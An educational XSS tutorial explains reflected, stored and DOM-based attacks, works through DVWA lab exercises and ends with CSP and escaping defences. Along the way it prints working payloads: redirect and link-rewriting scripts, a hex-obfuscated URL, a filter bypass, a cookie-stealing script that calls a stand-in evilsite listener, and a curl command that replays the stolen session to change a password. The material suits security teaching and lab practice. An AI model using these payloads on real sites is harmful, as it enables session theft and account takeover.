XSS: Cross Site Scripting

Cross-Site Scripting (XSS) is a web-based code injection attack allowing a hacker to place client-side scripts into webpages viewed by others. It can occur when untrusted user input is displayed on a webpage without first being sanitized and/or properly encoded.

The bad news is that XSS is widespread and can be very dangerous, making it one of the Top 10 vulnerabilities according to the Open Web Application Security Project (OWASP). The good news is that it can be prevented by properly sanitizing and encoding user input.

Where the Name Comes From

Back in the early days of Javascript, hackers figured out they could load a legitimate website as a frame in another website and then use Javascript to read into it. That is, one website could use scripting to cross a boundary into another website, and XSS was born. Netscape countered with its same-origin policy, but hackers looked for ever more creative ways to circumvent this feature.

Note that cross-site scripting is abbreviated XSS to distinguish it from Cascading Style Sheets (CSS), the language used to describe the visual presentation of web pages.

Evolution of XSS

Over the years XSS has evolved, and the name has become a bit of a misnomer, creating some confusion. The term cross-site implies a malicious website intruding into the functionality of a legitimate website, whereas today it mainly describes injecting malicious code onto a legitimate (but vulnerable) website (i.e., the second, malicious site typically is not present).

What Can Hackers Do?

If the XSS is effective, the hacker can do essentially anything you can!

  • Steal Your Cookies. Session hijacking.
  • Redirect You to Malicious Websites. Fake login pages, malware delivery websites.
  • Log Your Keystrokes. Key logging, clipboard access, sniffing other user events.
  • Rewrite the DOM. Deface pages, replace content.
  • Access Hardware. Turn on webcam, mic, GPS, etc.

OWASP maintains a list of XSS incidents.


XSS Delivery Strategies

In the XSS discussion we normally consider three entities: a user, a (legitimate) website the user is trying to visit, and a hacker who is trying to deliver a malicious payload to the user.

Reflected/Non-Persistent XSS

Reflected XSS refers to the case where a hacker is able to inject code into the user’s request and the legitimate website returns it to the user in an unsanitized form. Typically the XSS payload is delivered inside of a legitimate-looking URL pointing to a legitimate (but vulnerable) website. When the user clicks the link, the payload is reflected back to the user by the server. In essence the user is attacking themselves.

Attack summary

  1. Attacker convinces user to click a maliciously crafted link to a legitimate (but vulnerable) website
  2. Attack payload is (unwittingly) sent to server inside the client’s request
  3. Server-side processing incorporates the malicious script into the web page and returns it to client
  4. Client browser executes the malicious script
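
The four steps above can be sketched with a toy server-side page renderer. This is only an illustration under stated assumptions, not DVWA's code: the function name renderGreeting, the page template, and the example URL are all made up for this sketch.

```javascript
// Hypothetical server-side handler: builds the response page from the
// "name" query parameter without any encoding (this is the vulnerability).
function renderGreeting(requestUrl) {
  // Steps 1-2: the payload arrives inside the client's own request.
  const name = new URL(requestUrl).searchParams.get("name") || "";
  // Step 3: the untrusted value is concatenated straight into the HTML.
  return "<html><body>Hello " + name + "</body></html>";
}

const reflectedPage = renderGreeting(
  "http://goodsite.com/?name=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
);
// Step 4 would happen in the browser: the reflected <script> tag runs.
console.log(reflectedPage);
```

The server never stores anything here; the script tag exists only in the response to this one request.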

Stored/Persistent XSS

Persistent XSS refers to the case where a hacker is able to inject code that is stored on a webserver, and thus the malicious code originates from the server (as opposed to the client). If the site does not properly sanitize inputs, when the user visits the site, the hacker's code is sent to the user. A typical example would be a post on a social media website; the hacker makes a post that is actually Javascript. When the user visits the site, the Javascript is loaded (and run) in their browser.

Attack summary

  1. Attacker injects attack payload into website’s database, e.g., by posting a maliciously crafted comment to a blog
  2. The user visits the legitimate website and requests the affected page
  3. The website generates the page (e.g., loads the most recent comments from the database) and returns the result to the client
  4. Client browser executes the malicious script
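
As a rough sketch of these steps, the snippet below uses an in-memory array in place of the website's database. The names comments, postComment, and renderComments are hypothetical and exist only for this illustration.

```javascript
// Hypothetical in-memory stand-in for the website's database.
const comments = [];

// Step 1: anyone (including the attacker) can store a comment verbatim.
function postComment(author, text) {
  comments.push({ author: author, text: text });
}

// Step 3: the page is generated from stored data with no encoding.
function renderComments() {
  return comments
    .map((c) => "<p><b>" + c.author + "</b>: " + c.text + "</p>")
    .join("\n");
}

postComment("alice", "Nice article!");
postComment("mallory", "<script>alert('stored')</script>");

// Step 4 would happen in every visitor's browser, on every page view.
console.log(renderComments());
```

Unlike the reflected case, the victim does not need to click a crafted link; simply requesting the affected page is enough.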

DOM-Based XSS

DOM-based XSS is similar to reflected XSS in the sense that the attack begins by trying to get the user to visit a maliciously constructed URL (to a legitimate site). The difference is that the server does not write the payload into the returned HTML. Instead, the site's own client-side Javascript reads the payload (e.g., from the URL) and inserts it into the DOM at runtime.

Attack summary

  1. Attacker convinces user to click a maliciously crafted link to a legitimate website (as in the reflected attack)
  2. Server returns HTML including the vulnerable Javascript to client.
  3. Client browser executes the vulnerable Javascript returned by the website, which loads the payload into the DOM at runtime.

Notice that, unlike the reflected attack, the attack payload is not directly included in the HTML returned by the server. In reflected and stored XSS you would expect to see

<script> malicious code... </script>

directly in the returned HTML. In DOM-based XSS, the payload is only observed at runtime.

An Example

DOM-based XSS is becoming increasingly common as client-side page generation becomes more prevalent. For example, suppose the legitimate website had a script that creates a simple web page that tells you what your name is based on an argument in the URL.

<html>
	<script>
	function getQueryVariable(variable) {
	    var query = window.location.search.substring(1);
	    var vars = query.split('&');
	    for (var i = 0; i < vars.length; i++) {
	        var pair = vars[i].split('=');
	        if (decodeURIComponent(pair[0]) == variable) {
	            return decodeURIComponent(pair[1]);
	        }
	    }
	}
	document.write("Your name is " + getQueryVariable("name"));
	</script>
</html>

The getQueryVariable() function parses the URL, looking for the supplied argument, and returns its value. The Javascript then renders a simple page with the name. So, for example, visiting http://goodsite.com/index.html?name=Aleks would generate the page

<html>
	<head></head>
	<body>
		Your name is Aleks
	</body>
</html>

So now if a hacker constructs a malicious string like

http://goodsite.com/index.html?name=<script>alert('Busted')</script>

then when the page loads, the HTML will become:

<html>
	<head></head>
	<body>
		Your name is <script>alert('Busted')</script>
	</body>
</html>

Notice how the HTML served to the user did not contain the alert() payload?
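
To see where the payload comes from, the page's logic can be replayed outside the browser. The sketch below assumes a Javascript runtime that provides the standard URL class (for example Node.js). whatWouldBeWritten is a hypothetical helper that returns the string the page would hand to document.write(); it uses searchParams instead of the hand-written parser, which behaves the same for this input.

```javascript
// Hypothetical helper: reproduces what the vulnerable page would write,
// given only the URL the victim was tricked into visiting.
function whatWouldBeWritten(pageUrl) {
  // searchParams.get() percent-decodes the value, much like the
  // decodeURIComponent() call in getQueryVariable.
  const name = new URL(pageUrl).searchParams.get("name");
  return "Your name is " + name;
}

console.log(
  whatWouldBeWritten(
    "http://goodsite.com/index.html?name=<script>alert('Busted')</script>"
  )
);
```

The server's response is identical for every visitor; only the URL in the victim's address bar differs.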

The getQueryVariable function is borrowed from here.

Damn Vulnerable Web App (DVWA)

To demonstrate XSS in action, we use the Damn Vulnerable Web Application (DVWA) framework. Here’s an installation guide for Kali Linux. If DVWA complains that PHP cannot write to files, you may need to change the file ownership:

chown -R www-data:www-data <dvwa directory>

Basic XSS

Once DVWA is up and running, we’ll start by going to the DVWA Security tab and setting the security level to low. Next we go to the Reflected XSS tab. Start by entering some text into the What is your name? text box and hit submit. The result will be: Hello <whatever you type>. So instead of entering plain text, try entering some Javascript:

<script>alert('Hello XSS')</script>

Now you should see a Javascript alert with the message “Hello XSS”. Ok, let’s try something else. How about a redirect:

<script>document.location = "http://google.com"</script>

Of course, if you can inject Javascript, you can probably inject HTML too. One popular XSS tactic of yesteryear was to load another webpage in an <iframe>:

<iframe src="http://uwo.ca"></iframe>

Now in reflected XSS, we’re usually talking about the malicious code being delivered in a URL. Suppose we wish to encode our first example as a URL:

http://goodsite.com/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28%27Hello%20XSS%27%29%3C/script%3E
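
A link like this can be generated rather than encoded by hand. The following is a minimal sketch using the built-in encodeURIComponent(); buildLink is a hypothetical helper name. Note that encodeURIComponent() leaves ', ( and ) unescaped and does escape /, so its output differs slightly from the URL above, but both decode to the same payload.

```javascript
// Hypothetical helper: appends a percent-encoded payload to the
// vulnerable page's "name" parameter.
function buildLink(payload) {
  return (
    "http://goodsite.com/dvwa/vulnerabilities/xss_r/?name=" +
    encodeURIComponent(payload)
  );
}

const helloPayload = "<script>alert('Hello XSS')</script>";
console.log(buildLink(helloPayload));

// Decoding the hand-encoded value from the URL above gives the same script.
console.log(
  decodeURIComponent("%3Cscript%3Ealert%28%27Hello%20XSS%27%29%3C/script%3E")
);
```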

Now imagine we put this link in an email! Even if the user inspects the link and finds the site is legitimate, if the site is vulnerable to XSS, then the user will still be subjected to the attack (unless of course the user has Javascript disabled!).

More Complex XSS

Now suppose we wish to do something more complex involving functions and variables, like changing elements in the DOM. We need to wait for the DOM to load before we can make changes, so we can invoke window.onload to wait. Then we run arbitrary Javascript. In this example, we replace the link to the OWASP article on XSS with a link to evilsite (and even change the link color to red for effect):

<script>
	window.onload = function() {
		s=document.getElementsByTagName("a")[17];
		s.href="http://evilsite.com";
		s.text="http://evilsite.com";s.style.color="red";
	}
</script>

When encoded as a URL it becomes:

http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.onload%20=%20function%28%29%20{s=document.getElementsByTagName%28%22a%22%29[17];s.href=%22http://evilsite.com%22;s.text=%22http://evilsite.com%22;s.style.color=%22red%22;}%3C/script%3E

From there we can further obfuscate the URL to contain hex values:

http://localhost/dvwa/vulnerabilities/xss_r/?name=%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64=%66%75%6E%63%74%69%6F%6E%28%29%7B%73=%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%22%61%22%29%5B%31%37%5D%3B%73%2E%68%72%65%66=%22%68%74%74%70%3A%2F%2F%65%76%69%6C%73%69%74%65%2E%63%6F%6D%22%3B%73%2E%74%65%78%74=%22%68%74%74%70%3A%2F%2F%65%76%69%6C%73%69%74%65%2E%63%6F%6D%22%3B%73%2E%73%74%79%6C%65%2E%63%6F%6C%6F%72=%22%72%65%64%22%3B%7D%3C%2F%73%63%72%69%70%74%3E
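
The hex form is just percent-encoding applied to every character instead of only the reserved ones. A small sketch of that transformation follows; hexEncode is a hypothetical helper and assumes an ASCII-only payload. Unlike the URL above, it also encodes the = signs, which is equally valid.

```javascript
// Hypothetical helper: percent-encodes every character of an ASCII string.
function hexEncode(text) {
  return Array.from(text)
    .map(
      (ch) =>
        "%" + ch.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")
    )
    .join("");
}

console.log(hexEncode("<script>")); // %3C%73%63%72%69%70%74%3E

// The browser (or server) decodes it back to the original text.
console.log(decodeURIComponent(hexEncode("<script>")));
```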

Now stick that in a phishing email.

Let’s simulate a passive malicious website, evilsite, that steals cookies from a site, goodsite, using a cross-site scripting attack. The XSS directs a user visiting goodsite to fetch a (non-existent) image from evilsite. This has two components:

  1. Phone home. The XSS Javascript fetches the image but it is not added to the DOM, so from the user’s perspective nothing unusual-looking happened. The image doesn’t exist, and the malicious server doesn’t respond. It’s just a low-profile way to contact the malicious server.
  2. Exfiltrate cookie. The XSS Javascript sets the URL of the “image” to the malicious website + the legit website’s cookie, e.g.,
http://evilsite.com/<cookie>

Instead of creating a whole separate web server for evilsite, we can simulate one by putting a network listener on another port. So in this example localhost:80 will represent goodsite.com and localhost:1234 will represent evilsite. We then set up netcat to listen on port 1234:

netcat -lvp 1234

Then we construct our XSS payload as follows:

<script>new Image ().src="http://localhost:1234/"+document.cookie;</script>

This dummy request sends the user’s cookie to evilsite, which registers the following GET request from the user’s machine:

connect to [127.0.0.1] from localhost [127.0.0.1] 38900
GET /security=low;%20PHPSESSID=kavqn49seghn91lcbs6j411v75 HTTP/1.1
...

evilsite now has the user’s cookie!
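
The cookie string sits in the path of the logged request line, so recovering the individual cookies is a matter of simple string handling. The sketch below is one possible way to do it; parseStolenCookies is a hypothetical helper written for this example and assumes the request line has exactly the shape shown above.

```javascript
// Hypothetical helper: extracts cookie name/value pairs from a request
// line of the form "GET /<cookie string> HTTP/1.1".
function parseStolenCookies(requestLine) {
  // Take the path (second field) and drop its leading "/".
  const path = requestLine.split(" ")[1].slice(1);
  const cookies = {};
  // The browser percent-encoded the space after ";", so decode first.
  for (const part of decodeURIComponent(path).split(";")) {
    const idx = part.indexOf("=");
    if (idx === -1) continue; // skip fragments that are not name=value
    cookies[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return cookies;
}

console.log(
  parseStolenCookies(
    "GET /security=low;%20PHPSESSID=kavqn49seghn91lcbs6j411v75 HTTP/1.1"
  )
);
```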

Recall that the owners of evilsite used XSS to steal a user’s cookie. Now they wish to use it to impersonate the user, for example, to change the user’s password. The cookie is passed to curl in the usual name=value form (without the leading slash and with the %20 decoded back to a space):

curl --cookie "security=low; PHPSESSID=kavqn49seghn91lcbs6j411v75" --location "localhost/dvwa/vulnerabilities/csrf/?password_new=chicken&password_conf=chicken&Change=Change#" | grep "Password"

The result is:

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4865  100  4865    0     0   168k      0 --:--:-- --:--:-- --:--:--  169k
		<pre>Password Changed.</pre>

XSS Under Harder DVWA Security Levels

Medium

Suppose we set the DVWA security level to Medium and visit the XSS (Stored) page. We try to add the message:

<script>alert('busted!')</script>

This time no alert is displayed. Instead the following text appears in the comment field:

alert(\'busted!\')

Obviously the website is now doing some checking. Inspecting source/medium.php, we find the following relevant code validating the name field:

// Sanitize name input
$name = str_replace( '<script>', '', $name );

Notice any instance of <script> is deleted. However, it only checks for this exact match. So how about we try:

<Script>alert('busted!')</script>

It works!
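
The weakness is easy to reproduce outside PHP. The sketch below is a Javascript stand-in for the str_replace() call, not DVWA's code; sanitizeMedium is a hypothetical name, and it models only this one filter, not any other processing DVWA applies.

```javascript
// Javascript stand-in for PHP's str_replace('<script>', '', $name):
// removes every exact, case-sensitive occurrence of "<script>".
function sanitizeMedium(name) {
  return name.split("<script>").join("");
}

// The lowercase tag is stripped...
console.log(sanitizeMedium("<script>alert('busted!')</script>"));
// ...but a differently-cased tag passes through untouched.
console.log(sanitizeMedium("<Script>alert('busted!')</script>"));
```

Browsers treat HTML tag names case-insensitively, so the second input still runs as a script.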

High

Now let's go to the High security level. Inspecting source/high.php, we find different code validating the name field:

// Sanitize name input
	$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );

This uses the PHP preg_replace function, which uses regular expressions to find and replace offending string patterns. In this case it looks for a pattern of the form:

<*s*c*r*i*p*t

and deletes any such occurrence, using the /i modifier to make the match case insensitive. This does a pretty good job of sanitizing out any <script> tags, but it wouldn't, for example, catch the <iframe> attack described above.
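
The same regular expression can be tried in Javascript to see what it removes and what it lets through. This is an approximation of the PHP behavior for single-line input, not DVWA's code; sanitizeHigh is a hypothetical name, and the g flag is added because preg_replace replaces all matches by default.

```javascript
// Javascript approximation of the preg_replace() call in high.php.
function sanitizeHigh(name) {
  return name.replace(/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/gi, "");
}

// Script tags are swallowed regardless of case; only ">" survives.
console.log(sanitizeHigh("<Script>alert('busted!')</script>"));
// The iframe tag contains no s...c...r...i...p...t sequence, so it survives.
console.log(sanitizeHigh('<iframe src="http://uwo.ca"></iframe>'));
```

A deny-list aimed at one tag name says nothing about the many other HTML constructs that can load content or run script.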

Impossible

Now we examine the Impossible security level. Inspecting source/impossible.php we find yet again new code for validating the name field:

$name = stripslashes( $name );
$name = htmlspecialchars( $name );

In particular, htmlspecialchars() looks for special HTML characters and converts them to HTML entities. So, e.g., <script> becomes &lt;script&gt;, which the browser displays as text instead of interpreting as a tag. This input is now protected against XSS.

Preventing XSS

Security Headers

One important means of mitigating XSS attacks is to set a strict Content Security Policy (CSP) header that allows approved content sources and rejects all other content.
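
As an illustration, a policy is just a semicolon-separated list of directives sent in the Content-Security-Policy response header. The sketch below assembles one such value; buildCsp is a hypothetical helper, and the particular directives chosen are an example policy, not a recommendation for any specific site.

```javascript
// Hypothetical helper: joins directive names and their allowed sources
// into a Content-Security-Policy header value.
function buildCsp(directives) {
  return Object.entries(directives)
    .map(([name, sources]) => name + " " + sources.join(" "))
    .join("; ");
}

const cspValue = buildCsp({
  "default-src": ["'self'"], // only load content from our own origin
  "script-src": ["'self'"], // no inline scripts, no third-party scripts
  "object-src": ["'none'"], // no plugins
});

console.log("Content-Security-Policy: " + cspValue);
```

With a policy like this, an injected inline <script> block is refused by the browser even if it reaches the page.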

Escaping Special Characters

Preventing XSS is all about escaping characters that have special meaning. For example the following characters should be escaped as follows:

 & --> &amp;
 < --> &lt;
 > --> &gt;
 " --> &quot;
 ' --> &#x27;
 / --> &#x2F; 

The important thing is to use an existing library for sanitizing strings (don’t write it yourself!).
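
Purely to illustrate the mapping in the table above, and not as a replacement for a vetted library, the escaping can be sketched in a few lines. HTML_ESCAPES and escapeHtml are hypothetical names; this sketch covers only the HTML body context and does not handle attribute, URL, or Javascript contexts.

```javascript
// The six replacements listed in the table above.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
  "/": "&#x2F;",
};

// Replaces each special character in a single pass, so the "&" that
// begins an entity we just produced is never escaped a second time.
function escapeHtml(text) {
  return String(text).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml("<script>alert('x')</script>"));
```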

Further Reading